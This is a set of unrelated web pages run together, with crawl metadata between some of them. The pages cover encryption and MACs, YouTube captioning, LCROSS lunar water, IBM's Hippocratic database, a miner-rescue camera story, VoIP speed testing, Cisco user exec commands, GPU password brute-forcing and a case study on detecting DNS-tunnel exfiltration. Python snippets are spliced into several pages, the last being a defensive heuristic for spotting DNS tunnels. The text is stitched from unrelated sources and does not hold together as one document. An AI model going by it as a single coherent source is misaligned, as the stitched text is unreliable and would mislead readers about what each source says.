The most common use of cryptography in the business environment is for data encryption. Encryption is the disguising of a message in such a way that its true meaning is shielded until it is deciphered by the intended receiver. There are many different ways to accomplish this. The most common approach is through the use of ciphers. In a typical scenario, a message is encoded using a predetermined and agreed-upon protocol and cipher. The resulting message, called the ciphertext, is then transmitted to the receiver. Once the message is delivered, the receiver decrypts the message using the agreed-upon protocol. Many different encryption protocols exist. Some are more secure and more practical than others. Effective protocols provide strong security and ensure complete confidentiality of sensitive user information.
Your data is only as secure as the encryption protocol used to encrypt it. Once the protocol has been compromised, an intermediary is free to steal, read, delete, or modify your data. Worse yet, an intermediary user could intercept the messages and pretend to be the user. Bank accounts could be emptied, credit cards could be used and serious crimes could be committed without the user's knowledge. For obvious reasons, the ramifications of this are disastrous. It is for this reason that ensuring the integrity of your data is just as important as securing it.
Data integrity is achieved in modern cryptography by using a hash function to produce a unique "digital fingerprint" of a document. In other words, a complex function is applied to a document to create a unique value. When the message is delivered, the user applies the same hash function to the message. If the resulting values match, then the message likely has not been modified. While even the best hash functions are not guaranteed to produce unique values every time, the chance that two different documents will produce the same value is extremely small. Different hashing routines exist for use in different scenarios. A common hashing routine is the Message Authentication Code (MAC). MACs, which are described in greater detail later in this document, combine encryption keys and hashing functions to allow users to transmit secure, key-dependent hash values.
In the event that both the hash function and the encryption protocol are compromised, an intermediary user can not only read confidential data, but also masquerade as somebody else. To prevent this from happening, a system is needed to provide sender authentication. Modern security protocols use a "digital signature" to electronically sign a document to prove that it originated from a specific user.
One common protocol combines a digital signature with a private key encryption routine to create a type of digital stamp. In order to verify the message, the receiver decrypts the digital stamp using the sender's public key. Assuming the sender's private key has not been compromised, this method assures the authenticity of the digital signature. The concept of digital signatures is widely used in the software industry today. Digital certificates are often used by software companies to distribute their applications over the Internet.
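To make the integrity and MAC ideas above concrete, here is a minimal sketch of a keyed-hash check in ordinary Python. This is not the RIM Crypto API itself, just the underlying concept: only someone who knows the shared key can produce a tag that verifies, so a modified message is detected.

```python
# Keyed-hash message authentication (the MAC idea described above).
import hashlib, hmac

def make_tag(key: bytes, message: bytes) -> bytes:
    return hmac.new(key, message, hashlib.sha256).digest()

def verify(key: bytes, message: bytes, tag: bytes) -> bool:
    # compare_digest avoids leaking timing information during the comparison
    return hmac.compare_digest(make_tag(key, message), tag)

key = b"shared-secret-key"                # example key, agreed on out of band
msg = b"Transfer $100 to account 42"
tag = make_tag(key, msg)

print(verify(key, msg, tag))                                # True: message unchanged
print(verify(key, b"Transfer $900 to account 66", tag))     # False: message was tampered with
```

A digital signature works along similar lines, except that the stamp is produced with the sender's private key and checked with the matching public key, so it also proves who sent the message.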
In the early history of Internet accessibility, video and audio were really not an issue; little existed and what did exist was not vital. At that time accessibility concentrated on the needs of people with vision impairments and, to a slightly smaller degree, on those with musculoskeletal issues. The requirement was for websites to be compatible with assistive technologies such as screen readers, screen magnifiers and various alternatives to keyboard and mouse input. At this stage people with hearing impairments did not have accessibility issues as they could read the text on the screen. This is not the whole story, as British Sign Language (BSL) is the first language for deaf people in Britain and written text is a second language; this means that deaf people would prefer BSL. I discussed the issue of BSL on websites in 'Should websites include sign language'. My major conclusion was that it would not be practical to convert all content into BSL and therefore web site owners would have to decide what content was important enough to convert into BSL.
But today, with the increased use of audio—and especially video—the deaf community is finding that increasing amounts of content are inaccessible. What is needed is captioning. The vast majority of video does not include captioning at the moment. Adding captioning has the obvious benefit of making the content available to the deaf and hard of hearing; but, like many other assistive technologies, it has a variety of other benefits:
- It can be used when it is difficult or inappropriate to listen.
- The text is crawled by search engines so captioned videos should get more and better hits.
- YouTube has a beta function to translate captions into other languages so the videos become accessible to a much larger audience.
- The caption could be an actual translation where having a high quality translation can be justified.
- The caption could be a video description, enabling users with vision impairments to better follow the action.
- Captions can be a learning tool as the viewer can relate the spoken word and the written word.
YouTube is the main purveyor of such content and does include the ability to add captions; but most user-created content does not include captions. This is hardly surprising because most creators are not even aware of the issue and, even if they are, may not be motivated to go to the extra effort of creating captions. This may be inevitable for privately created content but is not acceptable for content created for inclusion on commercial websites that should be accessible to all. The difficulty is that creating captions for YouTube clips has been hard and costly. Two recent innovations have made it more feasible and are discussed here:
YouTube now has a beta test version that transcribes the audio in real time using Google speech recognition. I have tried this on a few audios and at first sight it is amazing how good it is, but unfortunately at second view you become aware of the mistakes it makes. The problems are that it has to work on any voice, and some are clearer than others; it also has to work in real time, so the level of processing available is limited; and, finally, there is no correction facility, so the system does not learn. I believe it will be some years yet before this technology can provide an adequate solution.
At present it is what I describe as a band-aid facility; if there is no captioning and a person with a hearing impairment wants to know what the clip is about the transcription will give them a good clue. This is similar to me asking for an automatic translation of a web page, which is inaccessible to me because it is in a language I do not understand, reading the translation will give me a good indication if it is of real interest to me but I know there will be errors in the translation, some of which may be serious, so I would not quote from it without having it translated by a person. On the other hand Videocritter is a free tool that enables captioning to be created for YouTube. It was written by Ken Meyering as a college class project but is of a standard that you would expect from a commercial product. The process is very simple: - Log on to VideoCritter. - Connect to the video on YouTube. - You then have controls to listen to a portion of the video and immediately type the caption, then listen to some more and type some more. - There are also functions to review and correct. - When the caption file is complete you upload it to YouTube I have tried it and it is very easy—you just need a little practice to decide when to stop listening and to start typing. There are other similar tools available but I have not had a chance to do an in depth comparison. All of them require you to type the text so I have two requests for extra functionality to reduce the need to type: - If there is a pre-prepared script then it should be possible to upload this and then use the tools to sync it with the video. - The YouTube Beta transcribe function should produce a caption file that could then be edited and corrected using a tool. One final issue that needs to be resolved is that the standard YouTube Player is not fully accessible. Easy YouTube, which provided a much more accessible player, does not support closed captions. It really is time that YouTube recognised the importance of accessibility and provided a comprehensive solution. Given the need to be accessible and the other benefits that accrue from captioning I would strongly urge anyone, and especially commercial organisations, to start using these tools on the videos on their websites. Further, I would encourage users of the websites to complain when captioning is not included.
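For anyone curious what a finished caption file actually contains, here is a minimal sketch that writes captions in the common SubRip (.srt) format, one of the caption formats YouTube accepts for upload. The timings and text are invented examples; in practice the captions would come from a tool such as the ones described above.

```python
# Write a minimal SubRip (.srt) caption file from (start_sec, end_sec, text) tuples.
def to_timestamp(seconds: float) -> str:
    ms = int(round(seconds * 1000))
    h, rem = divmod(ms, 3600_000)
    m, rem = divmod(rem, 60_000)
    s, ms = divmod(rem, 1000)
    return f"{h:02}:{m:02}:{s:02},{ms:03}"

def write_srt(captions, path="captions.srt"):
    with open(path, "w", encoding="utf-8") as fh:
        for index, (start, end, text) in enumerate(captions, start=1):
            fh.write(f"{index}\n{to_timestamp(start)} --> {to_timestamp(end)}\n{text}\n\n")

write_srt([
    (0.0, 2.5, "Welcome to the demonstration."),
    (2.5, 6.0, "Captions make the video accessible to deaf viewers."),
])
```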
It now seems plausible that if NASA or another international space agency wanted to, it could build a human outpost, or even a spacecraft refueling outpost, on the Moon. NASA today released new research obtained from its Lunar CRater Observation and Sensing Satellite (LCROSS), which slammed into the Moon last year as part of an experiment to find out what the orb was really made of, and from the Lunar Reconnaissance Orbiter. The impact of the $80 million LCROSS mission into the lunar surface created an ice-filled debris plume that NASA scientists have been working "28 hour days" to analyze. NASA said the mission found evidence that the lunar soil within craters is rich in useful materials, and that the moon is chemically active and has a water cycle. Scientists also confirmed the water was in the form of mostly pure ice crystals in some places. "By understanding the processes and environments that determine where water ice will be, how water was delivered to the moon and its active water cycle, future mission planners might be better able to determine which locations will have easily-accessible water. The existence of mostly pure water ice could mean future human explorers won't have to retrieve the water out of the soil in order to use it for valuable life support resources. In addition, an abundant presence of hydrogen gas, ammonia and methane could be exploited to produce fuel," NASA stated. The volatiles found in the plume, which are compounds that freeze and are trapped in the cold lunar craters and vaporize when warmed by the sun, included methane, ammonia, hydrogen gas, carbon dioxide and carbon monoxide. The LCROSS instruments also discovered relatively large amounts of metals such as sodium, mercury and silver. The findings are published in a set of papers in Science, including one from Brown University planetary geologist Peter Schultz stating that the assortment of volatiles - the chemical compounds weakly attached to regolith grains - gives scientists clues about where they came from and how they got to the polar craters, many of which haven't seen sunlight for billions of years and are among the coldest spots in the solar system. Schultz said many of the volatiles originated with the billions-of-years-long fusillade of comets, asteroids and meteoroids that has pummeled the Moon. He thinks an assortment of elements and compounds, deposited in the regolith all over the Moon, could have been quickly liberated by later small impacts or could have been heated by the sun, supplying them with energy to escape and move around until they reached the poles, where they became trapped beneath the shadows of the frigid craters. In a Bloomberg interview, another LCROSS paper author, Anthony Colaprete, a planetary scientist for NASA at the Ames Research Center, detailed the potential space exploration importance of the findings: "The moon is an ideal stop-over because its gravity is one-sixth of earth's, and about 2 million pounds of fuel are required to get into low earth orbit. Once you get off earth, you've used a certain amount of fuel, and if you want to go somewhere else, you have to bring that fuel, but that makes it even harder to get off earth. If you can find resources on the moon, or anywhere else, we can use them to generate fuel in space, and use that infrastructure to bring humans to other places."
Colaprete told the Wall Street Journal about the Moon: "It's really wet." He and his NASA colleagues estimate that 5.6% of the total mass of the targeted lunar crater's soil consists of water ice. In other words, 2,200 pounds of moon dirt would yield a dozen gallons of water. While the findings may again spark interest in utilizing the Moon for human purposes, NASA's budget plan no longer includes such missions. The European Space Agency this year said it was moving forward with a plan to land an autonomous spacecraft on the moon by 2017, with the idea that a manned vehicle could land there sometime in the future. The space agency said several European space companies have already assessed the various mission options and designs. China this month launched a Moon probe and says it will land a rover on the Moon's surface in the future. LCROSS was made up of two spacecraft. The first, known as the heavy impactor Centaur, separated from the main LCROSS spacecraft and rocketed toward the moon's surface, burrowing at least 90 ft into the surface and throwing up an estimated 250 metric tons of lunar dust. Following four minutes behind, the second spacecraft flew through the debris plume, collecting and relaying data back to Earth before it too crashed into the lunar surface, burrowing in about 60 ft, NASA stated.
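As a rough sanity check of that estimate (assuming the usual figure of about 8.3 pounds per US gallon of water, which is not stated in the article), the arithmetic does come out to roughly a dozen gallons:

```python
# Back-of-the-envelope check of the "dozen gallons per 2,200 lb of soil" figure.
soil_lb = 2200            # pounds of lunar regolith
ice_fraction = 0.056      # 5.6% water ice by mass (LCROSS estimate)
lb_per_gallon = 8.34      # approximate weight of one US gallon of water

water_lb = soil_lb * ice_fraction
gallons = water_lb / lb_per_gallon
print(f"{water_lb:.0f} lb of water is about {gallons:.0f} gallons")
# -> roughly 123 lb, i.e. about 15 gallons, in the ballpark of "a dozen"
```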
10 Guiding Principles
The architecture for the Hippocratic database concept is to be based on 10 guiding principles: purpose specification, consent, limited collection, limited use, limited disclosure, limited retention, accuracy, safety, openness and compliance. The Hippocratic database and its components would work in the following way, according to IBM officials. First, metadata tables would be defined for each type of information collected. A Privacy Metadata Creator would generate the tables to determine who should have access to what data and how long that data should be stored. A Privacy Constraint Validator would check whether a site's privacy policies match a user's preferences, and once this is verified the data would be transmitted from the user to the database. In the final step, a Data Retention Manager would delete any items stored beyond the length of their intended purpose. Audit trails of queries also would be kept to allow for privacy audits and to guard the database from suspicion that it has been misused. While IBM researchers are interested in eventually including the Hippocratic database concept in IBM's DB2 database, they also want to expand interest in the concept. Agrawal hopes the presentation of the concept will lead other vendors and university researchers to embrace and evolve it. "I wanted the database community to become cognizant of the issues," Agrawal said. "I personally think it will help if others participate in it." A Data Accuracy Analyzer would test the accuracy of the data being shared. Once queries are submitted along with their intended purpose, the Attribute Access Control would verify whether the query is accessing only those fields necessary for the query's purpose. Only records that match the query's purpose would be visible, thanks to the Record Access Control component. The Query Intrusion Detector then would run compliance tests on the results to detect any queries whose access pattern varies from the normal access pattern.
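The attribute-level check described above can be illustrated with a small sketch. The table and purpose names here are invented, and in IBM's design the enforcement would live inside the database engine rather than in application code, so treat this purely as an illustration of the concept.

```python
# Sketch of purpose-limited attribute access: a query may only touch the
# columns registered for its declared purpose.
PRIVACY_METADATA = {
    # purpose           -> attributes that purpose is allowed to read
    "order_fulfillment": {"name", "shipping_address", "items"},
    "fraud_check":       {"name", "payment_card", "billing_address"},
}

def check_query(purpose: str, requested_attributes: set) -> bool:
    allowed = PRIVACY_METADATA.get(purpose, set())
    disallowed = requested_attributes - allowed
    if disallowed:
        print(f"Rejected: {purpose} may not access {sorted(disallowed)}")
        return False
    return True

check_query("order_fulfillment", {"name", "shipping_address"})   # allowed
check_query("order_fulfillment", {"name", "payment_card"})       # rejected
```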
The rescue of the trapped Chilean miners has finally been achieved. Amid one of the most important moments in the history of rescue operations, while many countries made every effort to provide rescue equipment, Planet Technology played an important role. When the Chilean miners had been trapped for more than two weeks since Aug. 5, and the rescue team found on Aug. 22 that there was a slim chance of survival underground, communication between the rescue team and the trapped miners became the priority. Transworld, Planet's partner in Chile, offered the Planet network camera and media converter to help set up video conferences among the rescue team, the family members and the trapped miners, so that the miners' lives and health could be monitored. The initial images conveyed by these devices moved the whole world. In the dark and humid shaft, the IR camera had to provide clear images in the darkness. In addition, in order to ensure a long-distance, high-quality video conference, a media converter worked with the camera to deliver stable networking. By transmitting interactive video and audio in real time through a two-way audio system, all parties were able to communicate. For more than one and a half months, these devices were the medium that conveyed hope, which was vital for the trapped miners to survive.
VoIP Speed Test
Running the Test
Running a VoIP speed test is an effective way to gauge whether your Internet connection is suitable to run a hosted PBX system using VoIP technology. A number of factors must be considered, including how many users you will have on a single internet connection and how many of those users will be on the phone at once. The VoIP speed test below considers a wide range of factors that determine your connection's suitability for VoIP; please read the results carefully and feel free to contact an Easy Office Phone representative for more information. While an internet connection may be suitable to handle one or two concurrent telephone calls, it may be unable to handle five or six concurrent calls. Please refer to our VoIP Requirements Checklist on how to select a router, calculate the appropriate amount of bandwidth and choose an effective means of implementing quality of service (QoS).
The VoIP speed test below will provide you with a number of measures that you can use to evaluate your Internet connection. The test will open in a new window.
VoIP Speed Test
Interpreting the Results
Now that you have run the VoIP speed test, you will need to interpret the results of the test using each of the measures discussed in this article. The following measures are discussed in this article:
- Bandwidth - Measures how much data your connection can send and receive (expressed as an amount of data per unit of time).
- Jitter - Measures how much variation exists between packets (sent and received).
- Packet Loss - Measures how much information (expressed in packets) is lost during transmission.
- Quality of Service - Measures how consistent the flow of data (bandwidth) is from your ISP.
- Mean Opinion Score - This is a numeric measure of the sound quality at the receiving end of the communication circuit.
- Max Pause - This is a measure of the longest pause recorded during the VoIP speed test (break in audio).
The first item examined during the VoIP speed test is bandwidth. Bandwidth measures how much data your internet connection can send (upload) and receive (download) over a time period of one second. In most cases your upload bandwidth and download bandwidth will differ considerably. Upload bandwidth is the limiting factor when determining whether you have enough bandwidth to sustain a certain number of concurrent telephone calls using VoIP. As an example, a typical voice call requires 87 Kbps of upload and download bandwidth. Did your VoIP speed test indicate that you might not have enough bandwidth for your desired number of users? Contact us for suggestions and guidance.
Jitter is one of the most important factors examined during the VoIP speed test. In basic terms, jitter is the difference between when packets are expected to arrive and when they actually arrive. This often has little impact when you are browsing the web or downloading an e-mail, but for a real-time application like voice over IP, it makes a big difference. In the world of VoIP, timing is everything, and when packets are constantly being received at unexpected times, an unstable voice connection can result. Watch carefully for this during the VoIP speed test. It's similar to trying to predict when there will be traffic problems on the highway: if you can't predict traffic, you can't be expected to be at work on time in the morning.
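As a simplified illustration of how a jitter figure can be derived from packet arrival times, here is a short sketch; real tools typically use the running estimate defined in RFC 3550, so this shows the idea rather than the exact formula the speed test uses.

```python
# Estimate jitter as the average deviation of packet inter-arrival times
# from the expected packet interval.
def estimate_jitter_ms(arrival_times_ms, expected_interval_ms=20.0):
    gaps = [t2 - t1 for t1, t2 in zip(arrival_times_ms, arrival_times_ms[1:])]
    deviations = [abs(gap - expected_interval_ms) for gap in gaps]
    return sum(deviations) / len(deviations)

# Packets sent every 20 ms but arriving slightly early or late:
arrivals = [0.0, 21.0, 39.5, 62.0, 80.0, 103.0]
print(f"estimated jitter: {estimate_jitter_ms(arrivals):.1f} ms")   # about 2 ms
```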
Some voice providers will implement a jitter buffer, which tries to calculate what the maximum amount of jitter will be in a voice conversation and thus delays the voice conversation in order to keep it from breaking up. A high level of jitter will cause severe degradation in call quality. If you saw a high level of jitter after running the VoIP speed test, you should be aware that your connection may have problems that could prevent it from properly running a VoIP service.
Packet loss refers to how much information is being lost during transmission; it's expressed in the VoIP speed test results as a percentage. For instance, packet loss of 5% means that 5 per cent of all data transmitted is not reaching its destination. Packet loss can be caused by failures in network cables within the office, excessive network congestion, or general problems with network switching equipment. Packet loss can be constant or occur in bursts; however, bursts are more typical. A burst of packet loss over a period of a few seconds will result in little or no voice traffic reaching you, and thus you may miss much of the conversation. Packet loss can be caused by a variety of sources. If you noticed packet loss in the results of your VoIP speed test, see below for some suggestions on reducing or preventing it.
- Avoid network transfers which result in saturation of the upstream bandwidth limit of your internet connection, or enable QoS, or (best option) provide a separate connection dedicated to VoIP
- Make sure that there are no ethernet duplex mismatches on your network, such as between a cable modem and a router
- Check network cables between all network devices such as switches, routers, and modems. Replace each one with a new one to make sure this is not causing the problem
- Restart all network equipment to make sure that your issue is not related to low network resources
Quality of Service
Quality of Service (QoS) is a major consideration in VoIP implementations and should not be ignored - when running the VoIP speed test, be sure to examine your QoS score! QoS deals with the issue of how to guarantee that packet traffic related to voice will not be delayed or dropped due to interference from other, lower-priority traffic. Imagine that you are uploading a large file to a remote website and at the same time you are trying to talk on the telephone. Your router does not know which type of traffic is more important, and thus it treats both types of traffic the same. This will likely result in a degradation of voice quality. There are numerous ways to handle QoS properly on a network and design your network with voice traffic in mind. QoS is discussed in the following article: VoIP requirements - Quality of Service. A QoS score of lower than 70 per cent means that there is a problem with your connection that will very likely impact voice quality. It is best to run this test multiple times, especially at times when you are experiencing a voice problem.
Mean Opinion Score
Rather than judging the quality of a voice connection by subjective terms such as "very bad" or "great," the voice industry has developed a scoring method to quantitatively measure what level of voice conversation you can expect. This is called the Mean Opinion Score, or MOS. The MOS gives us an indication of the perceived voice quality of the media after you have received it.
The MOS is expressed in the VoIP speed test as a number ranging from 1 to 5, where 1 is the worst and 5 is the best. The values do not need to be whole numbers.
MOS Ratings Table
5 - Excellent - Excellent sound quality (virtually perfect)
4 - Good - Good sound quality, resulting in a call similar to a long distance phone call
3 - Fair - Phone conversation has some interruptions requiring parties to repeat what was said
2 - Poor - Each party has issues hearing the other one speak clearly
1 - Terrible - Neither party can communicate effectively
Max Pause is the longest recorded pause in audio during the length of the VoIP speed test. Ideally you want this to be the smallest number possible, as a large number means that there were pauses in the audio conversation. A long delay could be caused by packet loss or network congestion at the source or destination.
Different Results at Different Times
Why might you get different results from a VoIP speed test at different times? Networks are dynamic environments, and conditions can change depending on network usage, time of day, and other factors. It is best to run the VoIP speed test a few times at different times of the day, or after you experience a network-related problem, to try to determine the source of the issue. For instance, you might experience a voice drop-out when an employee is uploading a large file but not at other times. If you didn't have QoS set up properly, this would affect your voice conversation and thus it would only appear on a VoIP speed test if the employee was still uploading the file - once they had finished the upload, the test might indicate perfectly good results.
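Putting the bandwidth figure quoted earlier to work, here is a quick way to estimate how many concurrent calls an upload link can comfortably carry. The 87 Kbps per call is the figure given above; the 80% headroom factor is an illustrative assumption, not a value from the article.

```python
# Estimate concurrent VoIP call capacity from upload bandwidth.
KBPS_PER_CALL = 87        # per-call bandwidth quoted above
HEADROOM = 0.80           # leave ~20% of the link for other traffic (assumption)

def max_concurrent_calls(upload_kbps: float) -> int:
    return int((upload_kbps * HEADROOM) // KBPS_PER_CALL)

for upload in (512, 1024, 5000):   # example upload speeds in Kbps
    print(f"{upload} Kbps upload -> about {max_concurrent_calls(upload)} concurrent calls")
```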
<urn:uuid:9c0ae4fc-3af3-498c-a74f-99d75009a3f6>
CC-MAIN-2017-04
http://ca.jive.com/resources/voip-speed-test
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00012-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947773
1,766
2.6875
3
Cisco Basics – User Exec Mode
In preparation for your CCNA exam, we want to make sure we cover the various concepts that you could see on your Cisco CCNA exam. So to assist you, below we will discuss the CCNA concept of entering a Cisco router's User Exec Mode. As you progress through your CCNA exam studies, I am sure with repetition you will find this topic becomes second nature. Let's see what it looks like to be in each one of these modes. Here I have telnetted into our lab router and I am in User Exec Mode:
The easiest way to keep track of the mode you're in is by looking at the prompt. The “>” means we are in User Exec Mode. From this mode, we are able to get information like the version of IOS, the contents of the Flash memory and a few others. Now, let's check out the available commands in this mode. This is done by using the “?” command and hitting enter:
Wow, see all those commands available? And just to think that this is considered a small portion of the total commands available when in Privileged Mode! Keep in mind that when you're in the console and configuring your router, you can use some shortcuts to save you typing full command lines. Some of these are:
Tab: By typing the first few letters of a command and then hitting the TAB key, it will automatically complete the rest of the command. Where there is more than one command starting with the same characters, when you hit TAB all those commands will be displayed. In the picture above, if I were to type “lo” and hit TAB, I would get a listing of “lock, login and logout” because all 3 commands start with “lo”.
?: The question mark symbol “?” forces the router to print a list of all available commands. A lot of the commands have various parameters or interfaces which you can combine. In this case, by typing the main command, e.g. “show”, and then putting the “?” you will get a list of the subcommands. This picture shows this clearly:
Other shortcut keys are:
CTRL-A: Positions the cursor at the beginning of the line.
CTRL-E: Positions the cursor at the end of the line.
CTRL-D: Deletes a character.
CTRL-W: Deletes a whole word.
CTRL-B: Moves the cursor back by one step.
CTRL-F: Moves the cursor forward by one step.
One of the most used commands in this mode is the “show” command. This will allow you to gather a lot of information about the router. Here I have executed the “show version” command, which displays various information about the router:
The “show interface <interface>” command shows us information on a particular interface. This includes the IP address, encapsulation type, speed, status of the physical and logical aspects of the interface and various statistics. When issuing the command, you need to replace <interface> with the actual interface you want to look at. For example, ethernet 0, which indicates the first Ethernet interface:
Some other generic commands you can use are “show running-config” and “show startup-config”. These commands show you the configuration of your router. The running-config refers to the running configuration, which is basically the configuration of the router loaded into its memory at that time. Startup-config refers to the configuration file stored in NVRAM. This, upon bootup of the router, gets loaded into the router's RAM and then becomes the running-config! So you can see that User Exec Mode is used mostly to view information on the router, rather than for configuring anything. Just keep in mind that we are touching the surface here and not getting into any details.
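The commands above are typed at the console. If you later want to collect the same user exec "show" output from a script, a library such as Netmiko can log in over SSH and run them for you. The snippet below is only an illustration and goes beyond the scope of this article; the device address and credentials are placeholders for your own lab router.

# Illustrative sketch (not part of the CCNA article): running user exec
# "show" commands over SSH with the Netmiko library.
# The host, username, and password are placeholders.
from netmiko import ConnectHandler

device = {
    "device_type": "cisco_ios",
    "host": "192.0.2.1",        # lab router (documentation address)
    "username": "student",
    "password": "lab-password",
}

conn = ConnectHandler(**device)
# Equivalent to typing the commands at the ">" prompt.
print(conn.send_command("show version"))
print(conn.send_command("show interfaces ethernet 0"))
conn.disconnect()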
This completes the User Exec Mode section. If you like, you can go back and continue to the Privileged Mode section. We hope you found this Cisco certification article helpful. We pride ourselves on not only providing top notch Cisco CCNA exam information, but also providing you with the real world Cisco CCNA skills to advance in your networking career.
<urn:uuid:2c0efe0b-e2d2-4d90-9392-7d0af0b74a9b>
CC-MAIN-2017-04
https://www.certificationkits.com/cisco-router-user-mode/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00012-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918175
908
2.546875
3
A team of researchers at Georgia Tech Research Institute is investigating whether passwords are now worthless, given the supercomputer-like performance now available to hackers using standard desktop graphics cards. "We've been using a commonly available graphics processor to test the integrity of typical passwords of the kind in use here at Georgia Tech and many other places," said Richard Boyd, a senior research scientist at the Georgia Tech Research Institute (GTRI). "Right now we can confidently say that a seven-character password is hopelessly inadequate - and as GPU power continues to go up every year, the threat will increase." The researchers have warned that software development kits simplify coding graphics cards to run general purpose applications rather than just graphics, which makes it easy to harness their power for hacking, according to Boyd. This new capability puts power into many hands, he says, and it could threaten the world's ubiquitous password-protection model because it enables a low-cost password-breaking technique that engineers call "brute-forcing." In brute-forcing, attackers can use a fast GPU (or even a group of linked GPUs) combined with the right software program to break down passwords that are excluding them from a computer or a network. The intruders' high-speed technique basically involves trying every possible password until they find the right one. Christian Brindley, Regional Technical Manager EMEA at VeriSign Authentication, said, "Lots of people think that they have a solid password - over 12 characters long, including a combination of letters, numbers and cases to increase their strength. "However, in today's world passwords are simply not enough to protect sensitive information on their own. In fact, VeriSign research of UK online adults showed that 39% of us disagree that 'user name plus password' is a strong enough security measure. "A password is only one layer of security, which criminals have proven they are able to bypass - either through brute force as the Georgia Tech researchers have demonstrated, or, often, simply by guessing.
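As a rough illustration of why a seven-character password is inadequate against brute force, the following back-of-the-envelope Python sketch counts the keyspace for printable-ASCII passwords and the time exhaustive search would take. The one-billion-guesses-per-second rate is an assumed figure chosen only for illustration, not a number quoted by the researchers.

# Illustrative sketch (not from the article): how long exhaustive search
# takes as password length grows.
ALPHABET = 95               # printable ASCII characters
GUESSES_PER_SECOND = 1e9    # assumed GPU brute-force rate, for illustration only

for length in range(6, 13):
    keyspace = ALPHABET ** length
    seconds = keyspace / GUESSES_PER_SECOND
    years = seconds / (3600 * 24 * 365)
    print(f"{length:2d} chars: {keyspace:.2e} combinations, "
          f"~{years:.2g} years at {GUESSES_PER_SECOND:.0e} guesses/s")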
<urn:uuid:0b2b3151-b2fd-4dfa-b5a9-9b77f1208423>
CC-MAIN-2017-04
http://www.computerweekly.com/news/1280093554/Graphics-card-supercomputers-render-passwords-pointless
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280718.7/warc/CC-MAIN-20170116095120-00498-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942033
439
3.265625
3
New York state is putting a new spin on traffic monitoring cameras by trying to measure the environmental benefits they can bring. By implementing more than 300 traffic cameras throughout the state and displaying live video feed on public Web sites, TV broadcasts and mobile devices, officials hope residents will know where traffic congestion is before getting into their vehicles. Funded by the New York State Energy Research and Development Authority (NYSERDA) and the New York State Department of Transportation, the program aims to curtail vehicle idling times, which creates more emissions than when vehicles are in motion. According to Sal Graven, NYSERDA spokesman, the effort stems from Gov. David Paterson's Renewable Energy Task Force, which promotes energy efficiency and conservation in the state. The yearlong project has already begun and explores ways to reduce carbon dioxide emission and vehicle mileage. "One way that fits in, and also as a part of that, is to look at reducing idling times for vehicles," Graven said. "While bringing this technology might actually, or could potentially, increase your miles because you would be forced to take a less direct, alternate route, the flipside is you're actually reducing energy consumption by maintaining an active flow of traffic." TrafficLand, a company that delivers live traffic video over the Internet and TV, is providing the real-time video along with Google Maps to display camera locations at www.trafficland.com. Web site users can click on a camera to view an area's traffic. Measuring the environmental benefit could prove to be a daunting task because users access the cameras remotely. But Graven said NYSERDA hopes to receive customer comments and will obtain the number of Web site hits from TrafficLand. He also said the transportation department might be taking actions to measure the environmental benefits. The project's results will be available in approximately one year. "If the cars, trucks and buses are able to flow freely and not sit and idle, then that is a plus for the environment because there aren't as much emissions being emitted into the air from idling as there are from extra vehicles in transit," Graven said.
<urn:uuid:21a56e7b-dd0f-43e4-994f-677531dbca7f>
CC-MAIN-2017-04
http://www.govtech.com/technology/New-York-Seeks-Green.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00342-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962183
433
2.5625
3
A government agency discovered several of its private, internal documents were available unsecured on the public Internet. The agency's security team quickly performed a forensic investigation to determine possible sources of the data leak. They took steps to isolate logical networks and to avoid traversal among production, staging, and corporate traffic. Based on the documents leaked, they zeroed in on the corporate network. Meanwhile, their IPS and IDS tools had not flagged any malicious behavior. The next steps, packet capture or log analysis, would take too much time without a narrower focus, and there was no guarantee that they would be able to find the source using their logs.
- Quickly identify the cause of the data leak and avoid time-consuming tasks such as packet capture and log analysis
- Prevent future data leaks
Using the ExtraHop platform and going back six months from the time of the internal publishing of the documents, the security team looked for anomalous behavior from all internal clients. They saw no unusual activity to common shadow storage (such as Dropbox) nor any FTP or SSH traffic to external servers. However, while examining user Internet usage, the security team noticed unusual DNS activity. While the average requests per client machine had been consistent, one machine had spikes of DNS traffic significantly higher than normal. The security team drilled down into that client machine and identified three concerning behaviors:
- The machine was making dozens of DNS requests per second.
- The DNS traffic exhibited large packet sizes, many of them 512 bytes, the maximum safe size for UDP packets.
- The DNS traffic was disproportionately TXT records instead of typical A records.
Given this abnormal DNS behavior, the security team believed that the host had been compromised and that malicious code was using DNS as a tunnel to extract data from the client machine. By combining large packet payloads with high delivery rates, the attacker was able to achieve multiple kilobits per second of throughput with TXT records, which can hold arbitrary data. The security team isolated the device, wiped the system, and was able to recover the user's workspace. They matched the leaked files to those on the client machine and ensured that no new files were leaked because of the system compromise. To prevent future attacks, the team set up a dashboard to look for a number of different indicators of suspicious activity. First, several alerts were set up to identify suspicious DNS behavior, including alerts on the combination of request rate, packet size, and record type described above, as well as on DNS requests from regions where the agency did not conduct business. Next, three additional checks were put in place. First, the volume of database transfers was plotted on a chart; the daily quantity of transfers was generally stable, so any spike would indicate a potential issue. Second, using an ExtraHop Application Inspection Trigger, the team monitored for outgoing SSH connections from any of its key databases (outgoing SSH connections were strictly prohibited). And finally, the team plotted and monitored authentication attempts to expose any brute-force or slow-loris-type guessing attempts.
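The three indicators above lend themselves to a simple heuristic. The Python sketch below is only an illustration of that idea, not ExtraHop's implementation; the window length and the rate, size, and TXT-ratio thresholds are assumed values chosen for demonstration.

# Illustrative sketch (not ExtraHop's implementation): flagging a host whose
# DNS traffic matches the three indicators described above.
# All thresholds are assumed demonstration values.
from collections import namedtuple

DnsQuery = namedtuple("DnsQuery", "timestamp record_type payload_bytes")

def looks_like_dns_tunnel(queries, window_seconds=60,
                          max_rate=5.0, big_packet=400, txt_ratio=0.5):
    """Return True if the query stream shows tunnel-like behaviour."""
    if not queries:
        return False
    rate = len(queries) / window_seconds
    big = sum(1 for q in queries if q.payload_bytes >= big_packet)
    txt = sum(1 for q in queries if q.record_type == "TXT")
    return (rate > max_rate and
            big / len(queries) > 0.5 and
            txt / len(queries) > txt_ratio)

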